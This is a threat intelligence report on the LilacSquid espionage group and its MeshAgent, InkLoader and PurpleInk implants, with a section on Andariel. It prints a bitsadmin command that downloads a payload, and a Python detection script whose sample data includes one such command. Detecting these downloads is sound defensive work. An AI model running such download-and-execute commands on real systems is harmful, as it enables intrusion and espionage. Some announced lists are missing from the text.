Last month, Avertium’s Cyber Threat Intelligence team reported on an advanced persistent threat actor (APT) known as LilacSquid. This month, we are digging further to uncover the threat actor's tactics and techniques.
Active since at least 2021, LilacSquid (also known as UAT-4820) focuses on cyber espionage. This threat actor has targeted IT companies developing software for research and industrial sectors in the U.S., energy sector organizations in Europe, and pharmaceutical companies in Asia.
The threat actor uses various tactics, techniques, and procedures that resemble those used by North Korean APT groups, specifically Andariel and its overarching structure, Lazarus. Their campaign utilizes MeshAgent, an open-source remote management tool, along with a customized version of QuasarRAT, referred to as "PurpleInk," as primary implants following the compromise of vulnerable application servers exposed to the internet. Let’s look at LilacSquid, as well as recommendations on how organizations can protect themselves from this kind of threat actor.
As previously stated, LilacSquid has been active since at least 2021. The threat actor targets IT enterprises in the U.S., energy industries across Europe, and pharmaceutical firms throughout Asia. Their primary goals are information theft and espionage.
LilacSquid aims to maintain extended access to compromised entities to exfiltrate valuable data to their own servers. To achieve initial access, LilacSquid uses a variety of techniques, such as exploiting vulnerabilities in publicly accessible application servers and utilizing compromised RDP credentials.
The tactics, techniques, and procedures (TTPs) used by LilacSquid closely resemble those of North Korean advanced persistent threat groups, such as Andariel and its parent organization, Lazarus. Notably, the use of MeshAgent software to maintain access post-compromise and the extensive use of proxy and tunneling tools suggest a possible connection between LilacSquid and Lazarus, indicating they might share tools, infrastructure, or other resources.
LilacSquid begins its attack by exploiting vulnerabilities in web applications. After gaining access, the threat actor deploys scripts to create folders for malware, then downloads and executes MeshAgent, an open-source remote management tool. This download typically uses the legitimate Windows tool bitsadmin with the following command:
bitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent-
MeshAgent uses a text configuration file called an MSH file, which includes a victim identifier and the Command & Control address. This tool allows the operator to list all target devices, view and control desktops, manage files, and collect system information. Once MeshAgent is running, it activates other tools like Secure Socket Funneling for proxying and tunneling communications, and the InkLoader/PurpleInk malware implants.
According to an analysis by Cisco Talos, when LilacSquid used compromised RDP credentials for access, the infection chain changed slightly. They either deployed MeshAgent and subsequent implants or introduced another component before PurpleInk.
InkLoader is a straightforward yet effective .NET-based malware loader, designed to execute a hardcoded executable or command. In this infection chain, InkLoader is the component that persists across reboots on the infected host, rather than the actual malware it runs. So far, we have only observed PurpleInk being executed via InkLoader, but LilacSquid might use InkLoader to deploy additional malware implants.
Talos observed that LilacSquid deployed InkLoader along with PurpleInk only when they successfully created and maintained remote sessions via RDP using stolen credentials. A successful RDP login led to the download of InkLoader and PurpleInk, copying these artifacts into the desired directories on disk, and registering InkLoader as a service. This service then started InkLoader, which in turn deployed PurpleInk.
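As an added example (not code from the original report or from Cisco Talos), the following Python flags the two host-side steps of the chain described above: a bitsadmin /transfer download that pulls from a remote URL, and a newly registered service whose binary runs from a path outside the usual system directories. The event records, their field names and all paths and addresses are constructed for this illustration.

```python
import re
import shlex

# Constructed sample events (a Sysmon-style process creation and a
# System-log style service install); field names and values are assumed.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority normal "
                r"http://203.0.113.10/m.exe C:\ProgramData\mesh\MeshAgent.exe"},
    {"event": "process_create", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers"},
    {"event": "service_install", "name": "InkSvc",
     "image_path": r"C:\ProgramData\ink\InkLoader.exe"},
    {"event": "service_install", "name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
]

# Directories a newly registered service binary is normally expected in.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")

def check_bitsadmin(ev):
    """Flag bitsadmin /transfer ... /download pulling from an http(s) URL.
    Returns (rule_name, detail) or None."""
    if ev.get("event") != "process_create" or not ev["image"].lower().endswith("bitsadmin.exe"):
        return None
    # Non-POSIX split keeps Windows backslash paths intact.
    args = [a.lower() for a in shlex.split(ev["cmdline"], posix=False)]
    if "/transfer" in args and "/download" in args:
        url = next((a for a in args if re.match(r"^https?://", a)), None)
        if url:  # bitsadmin's last argument is the local destination path
            return ("bitsadmin_remote_download", f"{url} -> {args[-1]}")
    return None

def check_service(ev):
    """Flag a new service whose binary lives outside the trusted directories
    (the chain above registers InkLoader as a service from a dropped path)."""
    if ev.get("event") != "service_install":
        return None
    path = ev["image_path"].lower().strip('"')
    if not path.startswith(TRUSTED_DIRS):
        return ("service_outside_system_dirs", f'{ev["name"]}: {ev["image_path"]}')
    return None

def scan(events):
    """Run both rules over every event; returns the list of findings in order."""
    return [f for ev in events for rule in (check_bitsadmin, check_service) if (f := rule(ev)) is not None]

if __name__ == "__main__":
    for rule_name, detail in scan(SAMPLE_EVENTS):
        print(rule_name, detail)
```

Both rules are deliberately narrow: legitimate bitsadmin jobs that are not remote downloads and services installed from the system directories pass through untouched.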
Image 1: LilacSquid's Initial Access
Source: Cisco Talos
The primary implant used by the LilacSquid threat actor, PurpleInk, is derived from QuasarRAT, a remote access tool available online since at least 2014. Development on PurpleInk began in 2021, starting from the QuasarRAT base, and it continues to receive updates. The malware is heavily obfuscated to make detection more difficult.
PurpleInk uses a base64-encoded configuration file containing the IP address and port number for the C2 server. It can gather basic information such as drive details (volume labels, root directory names, drive type, and format), running process information, and system information (memory size, username, computer name, IP addresses, computer uptime).
Additionally, PurpleInk can enumerate folders, file names, and sizes, and modify file contents. It can also start a remote shell and send or receive data from a specified remote address, usually a proxy server. Below are the capabilities PurpleInk has for communicating with its proxy servers:
InkBox is a malware loader designed to read from a predefined file path on disk and decrypt its contents. The decrypted content consists of another executable assembly, which is then executed by invoking its Entry Point within the InkBox process. This second assembly serves as the backdoor known as PurpleInk.
Since 2021, LilacSquid has been using InkBox to deploy PurpleInk. From 2023 onward, they modified their approach, allowing PurpleInk to run independently as a separate process. However, even in this updated method, PurpleInk is still initiated through another component called "InkLoader."
As previously mentioned, LilacSquid’s TTPs closely resemble those of Andariel, a threat actor operating under Lazarus. Like LilacSquid, Andariel (also known as Nickel Hyatt, Onyx Sleet, and Silent Chollima) is an advanced persistent threat (APT) group affiliated with North Korea's strategic interests. The group has been active since 2008 and is known for utilizing tactics such as spear-phishing, watering hole attacks, and exploiting known security vulnerabilities in software to gain initial access and deploy malware within targeted networks.
Andariel initially focused on information theft and cyber espionage activities primarily within the defense sector. However, after 2016, it shifted its focus to include monetary gain objectives and became involved in ransomware attacks, targeting the banking and technology sectors.
Andariel actively exploited the Log4j vulnerability last year, and a new malware called EarlyRat was discovered on a system affected by the Log4j exploit. However, the initial attack vector for EarlyRat was found to be spear phishing.
EarlyRat is straightforward in design and can execute specified commands. It shares similarities with MagicRat. It was distributed via a spear phishing campaign originating from servers associated with the HolyGhost/Maui ransomware campaign, involving macro-enabled documents. Upon execution, it communicates system information to its command and control (C2) server.
As of June 2024, Andariel has been observed deploying a new Golang-based backdoor named Dora RAT in its operations targeting educational institutions, manufacturing companies, and construction firms in South Korea.
The threat actor likely utilizes malicious tools like Keylogger, Infostealer, and proxy tools to manage compromised systems and extract data. The attacks involve the exploitation of a vulnerable Apache Tomcat server for malware distribution. The specific server involved was running an outdated 2013 version of Apache Tomcat, exposing it to multiple vulnerabilities.
To protect your organization from initial compromise tactics used by LilacSquid, it is essential to:
It’s important to get ahead of the curve by being proactive with protecting your organization, instead of waiting to put out a massive fire. Avertium can provide the following services to help keep your organization safe from MITM attacks:
LilacSquid: The stealthy trilogy of PurpleInk, InkBox and InkLoader (talosintelligence.com)
Deciphering LilacSquid's Strategies for Long-Term Data Theft (hivepro.com)
Global cyberespionage campaign deployed by LilacSquid (SC Media, scmagazine.com)
Andariel Group unleashes New EarlyRAT malware, HiveForce Labs Threat Advisory (hivepro.com)
New "LilacSquid" Cyberespionage Group and Custom Malware Discovered (Cyber Insider)
Unveiling the Depths of LilacSquid Attacks, Scott Bolen, RONIN OWL CTI (Medium, June 2024)
june-4-23-lilacsquid-the-stealthy-trilogy-of-purpleink-inkbox-and-inkloader.pdf (mphasis.com)
Andariel Hackers Target South Korean Institutes with New Dora RAT Malware (thehackernews.com)
Cyber Espionage Alert: LilacSquid Targets IT, Energy, and Pharma Sectors (thehackernews.com)
Ink Trails by LilacSquid: PurpleInk, InkBox, and InkLoader (Cyware Alerts - Hacker News)
This document and its contents do not constitute, and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be utilized to ensure that diligent measures are taken to lower the risk of potential weaknesses being exploited to compromise data.
Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of Client's compliance with any law, regulation or standard.